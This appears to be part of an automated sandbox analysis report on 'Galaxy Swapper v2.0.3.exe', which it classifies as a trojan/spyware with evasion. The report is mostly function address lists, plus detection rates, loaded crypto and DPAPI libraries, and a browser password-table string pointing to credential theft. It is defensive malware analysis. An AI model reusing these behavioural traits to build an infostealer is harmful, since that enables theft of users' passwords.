Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00446160	1_2_00446160
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00425100	1_2_00425100
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00445900	1_2_00445900
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0043C920	1_2_0043C920
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00420930	1_2_00420930
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_004239C0	1_2_004239C0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0044A1D9	1_2_0044A1D9
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0044C1E0	1_2_0044C1E0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0044C1F9	1_2_0044C1F9
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0044C1FB	1_2_0044C1FB
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0041D987	1_2_0041D987
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00433190	1_2_00433190
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0044D190	1_2_0044D190
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0040E9B0	1_2_0040E9B0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_004439B0	1_2_004439B0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00449240	1_2_00449240
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00431A62	1_2_00431A62
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00429260	1_2_00429260
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00408A10	1_2_00408A10
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00439210	1_2_00439210
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0044A954	1_2_0044A954
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0043F2C0	1_2_0043F2C0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0044AAD6	1_2_0044AAD6
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0041FAF1	1_2_0041FAF1
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0041628D	1_2_0041628D
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00402AA0	1_2_00402AA0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0040A360	1_2_0040A360
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00424370	1_2_00424370
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00427308	1_2_00427308
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00445330	1_2_00445330
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0040C3E0	1_2_0040C3E0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0044C3F0	1_2_0044C3F0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0042D381	1_2_0042D381
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00416BB4	1_2_00416BB4
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00413440	1_2_00413440
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00446440	1_2_00446440
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00428C60	1_2_00428C60
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0042EC75	1_2_0042EC75
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0043BC08	1_2_0043BC08
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00431C0C	1_2_00431C0C
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_004034C0	1_2_004034C0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00420CE6	1_2_00420CE6
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0044C490	1_2_0044C490
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0041CCA1	1_2_0041CCA1
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0044D4A0	1_2_0044D4A0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00430CAA	1_2_00430CAA
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0043CCB0	1_2_0043CCB0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0040AD60	1_2_0040AD60
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0043ED70	1_2_0043ED70
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00407D00	1_2_00407D00
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0042CD10	1_2_0042CD10
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00437514	1_2_00437514
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0041FD2D	1_2_0041FD2D
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0040DDC8	1_2_0040DDC8
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_004325D0	1_2_004325D0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00432DFC	1_2_00432DFC
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00424DA0	1_2_00424DA0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0042E5BB	1_2_0042E5BB
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0042B5BF	1_2_0042B5BF
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00427640	1_2_00427640
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00403E60	1_2_00403E60
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00425E00	1_2_00425E00
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0043AE0E	1_2_0043AE0E
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0040FE30	1_2_0040FE30
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_004306E0	1_2_004306E0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0040D680	1_2_0040D680
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0040BEA0	1_2_0040BEA0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_004246A0	1_2_004246A0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00404742	1_2_00404742
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00406F46	1_2_00406F46
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00420753	1_2_00420753
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00443750	1_2_00443750
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0040C700	1_2_0040C700
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00430725	1_2_00430725
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00422FC3	1_2_00422FC3
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0042EFE0	1_2_0042EFE0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00408FF0	1_2_00408FF0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00433FAB	1_2_00433FAB
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0040CFB0	1_2_0040CFB0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F300D0	1_2_00F300D0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F058A0	1_2_00F058A0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F1E0A0	1_2_00F1E0A0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F08090	1_2_00F08090
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F10890	1_2_00F10890
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F23890	1_2_00F23890
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F31890	1_2_00F31890
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F04080	1_2_00F04080
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F2D080	1_2_00F2D080
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F06070	1_2_00F06070
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F2F060	1_2_00F2F060
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F14040	1_2_00F14040
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F1A820	1_2_00F1A820
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F19020	1_2_00F19020
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F2A020	1_2_00F2A020
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F33813	1_2_00F33813
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F1C010	1_2_00F1C010
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F01000	1_2_00F01000
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F031F0	1_2_00F031F0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F1B1E0	1_2_00F1B1E0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F2F9B0	1_2_00F2F9B0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F16180	1_2_00F16180
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F0E170	1_2_00F0E170
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F33160	1_2_00F33160
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F04940	1_2_00F04940
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F1C940	1_2_00F1C940
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F32920	1_2_00F32920
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F20110	1_2_00F20110
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F29100	1_2_00F29100
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F4C908	1_2_00F4C908
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F2F2E0	1_2_00F2F2E0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F0F2D0	1_2_00F0F2D0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F152C0	1_2_00F152C0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F29AB0	1_2_00F29AB0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F0EAA0	1_2_00F0EAA0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F14290	1_2_00F14290
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F02280	1_2_00F02280
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F28A50	1_2_00F28A50
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F36A54	1_2_00F36A54
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F05220	1_2_00F05220
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F09220	1_2_00F09220
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F25220	1_2_00F25220
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F20A10	1_2_00F20A10
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F26A00	1_2_00F26A00
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F28200	1_2_00F28200
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F173F0	1_2_00F173F0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F1F3D0	1_2_00F1F3D0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F1ABA0	1_2_00F1ABA0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F06390	1_2_00F06390
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F13390	1_2_00F13390
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F1FB70	1_2_00F1FB70
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F21370	1_2_00F21370
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F20350	1_2_00F20350
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F08340	1_2_00F08340
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F2EB40	1_2_00F2EB40
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F0C310	1_2_00F0C310
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F0B300	1_2_00F0B300
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F1CCE0	1_2_00F1CCE0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F0E4C0	1_2_00F0E4C0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F13CC0	1_2_00F13CC0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F054A0	1_2_00F054A0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F10490	1_2_00F10490
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F33C90	1_2_00F33C90
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F06C80	1_2_00F06C80
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F16480	1_2_00F16480
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F25480	1_2_00F25480
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F32480	1_2_00F32480
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F33477	1_2_00F33477
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F25C60	1_2_00F25C60
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F28450	1_2_00F28450
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F02C40	1_2_00F02C40
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F1EC40	1_2_00F1EC40
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F28C40	1_2_00F28C40
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F05C20	1_2_00F05C20
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F41420	1_2_00F41420
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F3B41A	1_2_00F3B41A
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F2F5D0	1_2_00F2F5D0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F335C0	1_2_00F335C0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F155B0	1_2_00F155B0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F2EDB0	1_2_00F2EDB0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F09580	1_2_00F09580
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F2DD80	1_2_00F2DD80
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F1D560	1_2_00F1D560
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F1DD50	1_2_00F1DD50
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F2FD50	1_2_00F2FD50
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F18540	1_2_00F18540
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F07D30	1_2_00F07D30
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F0F530	1_2_00F0F530
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F0AD30	1_2_00F0AD30
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F19500	1_2_00F19500
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F126F0	1_2_00F126F0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F31EF0	1_2_00F31EF0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F1C6A0	1_2_00F1C6A0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F12E90	1_2_00F12E90
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F28690	1_2_00F28690
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F32E90	1_2_00F32E90
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F2B680	1_2_00F2B680
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F04660	1_2_00F04660
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F17E50	1_2_00F17E50
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F08640	1_2_00F08640
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F03640	1_2_00F03640
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F16E40	1_2_00F16E40
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F1B630	1_2_00F1B630
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F29630	1_2_00F29630
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F17620	1_2_00F17620
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F10E20	1_2_00F10E20
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F30620	1_2_00F30620
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F09FF0	1_2_00F09FF0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F067D0	1_2_00F067D0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F01790	1_2_00F01790
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F16790	1_2_00F16790
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F0B780	1_2_00F0B780
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F20F80	1_2_00F20F80
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F4E782	1_2_00F4E782
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F1FF70	1_2_00F1FF70
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F0E730	1_2_00F0E730
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F19720	1_2_00F19720
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F29F00	1_2_00F29F00

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: String function: 00F36F60 appears 102 times
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: String function: 0041A700 appears 98 times
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: String function: 00F44014 appears 34 times
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: String function: 0040B380 appears 44 times
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: String function: 00F3F1CC appears 46 times

Source: Galaxy Swapper v2.0.3.exe

Static PE information: invalid certificate

Source: Galaxy Swapper v2.0.3.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Galaxy Swapper v2.0.3.exe

Static PE information: Section: .bss ZLIB complexity 1.0003342689179633

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/0@1/1

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

Code function: 1_2_004446D0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

1_2_004446D0

Source: Galaxy Swapper v2.0.3.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985708391.000000000150E000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.958717654.0000000003CB6000.00000004.00000800.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.958258160.0000000003CE8000.00000004.00000800.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.985484505.0000000003CE8000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Galaxy Swapper v2.0.3.exe	Virustotal: Detection: 45%
Source: Galaxy Swapper v2.0.3.exe	ReversingLabs: Detection: 39%

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

File read: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe "C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe"
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Process created: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe "C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe"
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Process created: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe "C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: uxtheme.dll	Jump to behavior
